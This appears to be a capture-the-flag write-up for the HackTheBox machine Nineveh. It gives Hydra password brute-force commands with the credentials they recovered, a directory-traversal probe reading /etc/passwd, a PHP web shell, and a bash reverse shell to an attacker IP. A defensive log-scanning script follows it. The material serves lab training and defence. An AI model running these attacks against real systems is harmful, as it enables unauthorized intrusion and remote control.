Exploitation

Exploitation on this machine requires Hydra and steg to gain a reverse shell.

Hydra

HTTP /department/login.php

hydra -l admin -P /usr/share/seclists/Passwords/probable-v2-top12000.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 
  • username = admin

  • password = 1q2w3e4r5t

HTTPS /db/index.php

hydra -l admin -P /usr/share/seclists/Passwords/probable-v2-top12000.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
  • username = admin

  • password = password123

PHP Exploit

With the following exploit, an attacker can create a SQLite database with a .php extension and insert PHP code as text fields. When done, the attacker can execute it by accessing the database file using a browser.

Exploiting LFI and PHP

Checking for LFI vulnerability

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/../../../../../../etc/passwd

Executing code via PHP for Shell

In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section.

<?php echo system($_REQUEST ["cmd"]); ?>

Back on our LFI-vulnerable page:

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/random.php&cmd=ls
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/1234 0>&1'
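
Added example (not part of the original write-up): a defender-side check that scans a web access log for `notes` values that, like the two manage.php requests above, resolve outside the notes directory. The log lines are constructed, and the web root /var/www/html/department and all function names are assumptions made for the illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (hypothetical paths): manage.php lives in APP_DIR and only files
# under ALLOWED_BASE are legitimate values for the `notes` parameter.
APP_DIR = "/var/www/html/department"
ALLOWED_BASE = APP_DIR + "/files"

# Constructed access-log lines for the example, not taken from a real server.
SAMPLE_LOG = """\
10.10.14.34 - - [01/Jan/2024:10:00:01 +0000] "GET /department/manage.php?notes=files/ninevehNotes.txt HTTP/1.1" 200 1200
10.10.14.34 - - [01/Jan/2024:10:00:09 +0000] "GET /department/manage.php?notes=files/ninevehNotes/../../../../../../etc/passwd HTTP/1.1" 200 2900
10.10.14.34 - - [01/Jan/2024:10:00:15 +0000] "GET /department/manage.php?notes=files/ninevehNotes/..%2f..%2f..%2f..%2f..%2f..%2fvar/tmp/random.php&cmd=ls HTTP/1.1" 200 310
10.10.14.34 - - [01/Jan/2024:10:00:20 +0000] "GET /department/manage.php?notes=files/sub/../ninevehNotes.txt HTTP/1.1" 200 1200
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def resolve(value):
    """Collapse '.' and '..' lexically (no disk access, symlinks not followed)."""
    return posixpath.normpath(posixpath.join(APP_DIR, value))

def escapes_base(value):
    """True when the resolved path is not ALLOWED_BASE or something beneath it."""
    resolved = resolve(value)
    return not (resolved == ALLOWED_BASE or resolved.startswith(ALLOWED_BASE + "/"))

def find_traversal(log_text):
    """Return one finding per `notes` value that leaves ALLOWED_BASE."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = parse_qs(urlsplit(target).query)   # percent-decodes the values
        for value in query.get("notes", []):
            if escapes_base(value):
                findings.append({
                    "client": client,
                    "status": int(status),
                    "resolved": resolve(value),
                    # other parameters sent along, e.g. `cmd` to an included file
                    "extra_params": sorted(set(query) - {"notes"}),
                })
    return findings

if __name__ == "__main__":
    for finding in find_traversal(SAMPLE_LOG):
        print(finding)
```

The same resolve-then-compare test, applied in manage.php before the include (PHP's realpath() plus a prefix check), is what closes the hole; a `..` that stays inside the notes directory, as in the last sample line, is not flagged.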
